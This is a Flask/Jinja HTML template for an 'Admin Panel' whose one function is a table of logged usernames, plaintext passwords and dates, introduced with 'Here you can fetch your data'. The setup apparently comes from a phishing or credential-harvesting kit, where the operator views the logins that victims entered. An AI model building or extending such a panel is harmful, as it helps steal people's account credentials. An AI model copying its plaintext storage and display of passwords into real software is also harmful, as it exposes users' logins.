{% extends 'admin_base.html' %}

{% block style %}
<style>
    .container {
        max-width: 980px;
    }
    body {
        background-color: #f4f4f4;
    }
</style>
{% endblock %}

{% block content %}
<div class="container d-flex flex-column">
    <h1 class="text-center mt-5">Welcome to the Admin Panel</h1>
    <h5 class="text-center fw-normal">Here you can fetch your data</h5>
    <a href="{{ url_for('admin_logout') }}" style="align-self: center;"><button type="button"
            class="btn btn-primary mb-5">Logout</button></a>
    <div class="table">
        <div class="row">
            <div class="col-4 text-center py-2 fw-bold">Username</div>
            <div class="col-4 text-center py-2 fw-bold">Password</div>
            <div class="col-4 text-center py-2 fw-bold">Date</div>
        </div>
        {% for log in logs %}
        <div class="row border" style="border-color: #a1a1a1!important;">
            <div class="col-4 text-center py-2">{{ log.username }}</div>
            <div class="col-4 text-center py-2 border border-top-0 border-bottom-0" style="border-color: #a1a1a1!important;">{{ log.password }}</div>
            <div class="col-4 text-center py-2">{{ log.date.strftime('%m/%e/%y %H:%M:%S') }}</div>
        </div>
        {% endfor %}
    </div>
</div>
{% endblock %}